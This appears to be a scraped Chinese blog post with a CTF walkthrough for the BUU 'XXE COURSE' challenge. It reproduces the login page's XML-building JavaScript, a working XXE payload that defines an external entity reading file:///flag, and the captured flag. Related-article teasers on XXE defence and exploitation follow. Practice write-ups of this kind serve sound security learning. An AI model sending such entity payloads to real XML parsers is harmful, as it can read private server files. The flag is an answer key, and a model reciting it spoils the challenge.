BUU XXE COURSE
发现输入的username被alert了
查源码
onclick="XMLFunction()"
抓包看xml格式
回来看控制台
发现js的xml应用
<script type="text/javascript">function XMLFunction(){var xml = '' +'<?xml version="1.0" encoding="UTF-8"?>' +'<root>' +' <username>' + $('#username').val() + '</username>' +' <password>' + $('#password').val() + '</password>' +' </root>';var xmlhttp = new XMLHttpRequest();xmlhttp.onreadystatechange = function () {if(xmlhttp.readyState == 4){console.log(xmlhttp.readyState);console.log(xmlhttp.responseText);alert(xmlhttp.responseText);}}xmlhttp.open("POST","login.php",true);xmlhttp.send(xml);};</script>
构造xxe攻击
这是post包传的时候记得把注释删去
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY flag SYSTEM "file:///flag"><!--构造实体-->
]>
<root>
<username>&flag;</username><!--输出flag实体-->
<password>2333</password>
</root>
flag{6866a844-3788-4a9d-9909-1d9d9943f56f}
BUU XXE COURSE相关推荐
- java中xxe漏洞修复方法
java中禁止外部实体引用的设置方法不止一种,这样就导致有些开发者修复的时候采用的错误的方法 之所以写这篇文章是有原因的!最早是有朋友在群里发了如下一个pdf, 而当时已经是2019年1月末了,应该不 ...
- java SAX 防xml注入,如何防止XML注入像XML Bomb和XXE攻击
您是否尝试过 OWASP page的以下代码段? import javax.xml.parsers.DocumentBuilderFactory; import javax.xml.parsers.P ...
- XXE漏洞检测及代码执行过程
这两天看了xxe漏洞,写一下自己的理解,xxe漏洞主要针对webservice危险的引用的外部实体并且未对外部实体进行敏感字符的过滤,从而可以造成命令执行,目录遍历等.首先存在漏洞的web服务一定是存 ...
- switchyomega插件_CTF|你所关注的CTFer都在用的插件合集【附:XXE补给+CTF训练集】...
不看后悔系列,建议收藏 相信大家对 CTF 都不陌生了,今天为大家带来了一系列 CTF 必备 Chrome 插件. CTF 可能很多人想学 CTF,但又怕零基础学不懂.其实,CTF 并没有那么难. C ...
- zimbra xxe+ssrf 导致 getshell
前言 2019年3月13号,国外一名安全研究员在他的博客上公布了zimbra的这起漏洞,但是其中并未提到一些漏洞的利用细节,在此我将整个漏洞的利用过程进行复现. 原文链接:https://blog.t ...
- xxe漏洞攻防 简介 xml 引用外部实体 构造恶意内容
目录 一.XML基础知识 二.XML外部实体注入(XML External Entity) 三.客户端XXE案例 四.防御XXE攻击 一.XML基础知识 XML用于标记电子文件使其具有结构性的标记语言 ...
- cve-2017-12629 apache solr xxe rce 漏洞分析
Versions Affected Apache Solr before 7.1.0 with Apache Lucene before 7.1 Elasticsearch, although it ...
- 浅谈XXE漏洞攻击与防御——本质上就是注入,盗取数据用
浅谈XXE漏洞攻击与防御 from:https://thief.one/2017/06/20/1/ XML基础 在介绍xxe漏洞前,先学习温顾一下XML的基础知识.XML被设计为传输和存储数据,其焦点 ...
- XXE Lab:1题解
思路 题目已经提示是XXE的专项练习,所以,直接找XXE问题. 难度 入门 端口扫描 nmap -sS -A 10.129.10.64 发现HTTP服务.Apache 2.4.27中间件.robots ...
- 1016.XXE漏洞攻防学习
前言 对于xxe漏洞的认识一直都不是很清楚,而在我为期不长的挖洞生涯中也没有遇到过,所以就想着总结一下,撰写此文以作为记录,加深自己对xxe漏洞的认识. xml基础知识 要了解xxe漏洞,那么一定得先 ...
最新文章
- Jmeter脚本录制(APP)
- 1.springMVC+spring+Mybatis的整合思路
- ylbtech-LanguageSamples-Arrays(数组)
- 中公教育计算机网络,计算机考试题库:计算机网络模拟练习题(2)
- html messagebox确定取消,Element MessageBox弹框的具体使用
- 【图像超分辨率论文】BasicVSR++: Improving Video Super-Resolution with Enhanced Propagation and Alignment
- maven aspectj_使用Spring AspectJ和Maven进行面向方面的编程
- Intellij idea安装JRebel插件 实现代码的热部署
- 不良事件总结怎么写_护理不良事件总结分析.doc
- java 静态绑定_java的动态绑定和静态绑定
- Wannafly挑战赛14 F
- 计算机美食网页毕业论文,毕业论文--美食网页计与制作.doc
- JavaScript的通用库与动画特效
- SAP 用户没有下载数据到本地的权限
- PIL(pillow)读取图片自动旋转的问题
- CTF初学笔记解题-密码1
- meta标签(以京东首页为例)
- 【中土世界】萨鲁曼小传
- 朱子治家格言(清朝·朱柏庐)
- python+selenium+chrome实现淘宝购物车秒杀自动结算
热门文章
- 魅族的usb计算机连接无法使用,魅族16怎么连接电脑 魅族手机连接电脑无法识别...
- 马克思在《数学手稿》中提出如下问题:有30个人(包括男人、女人和小孩)在一家饭店吃饭共花50先令,其中每个男人花3先令,每个女人花2先令,每个小孩花1先令,问男人、女人、小孩各有多少人
- 全国海选第三期:广州赛区节目视频
- 基于访客的网络(VBN)
- 3.注册后台处理逻辑编写
- 验证性因子分析(二)
- 安工大计算机学院李雪,计算机学院本科生党支部召开党员大会
- wamp3.1.0 X64下载链接(最新)
- 前端别再错过2022的金三银四了。。
- React组件抽象(一): mixin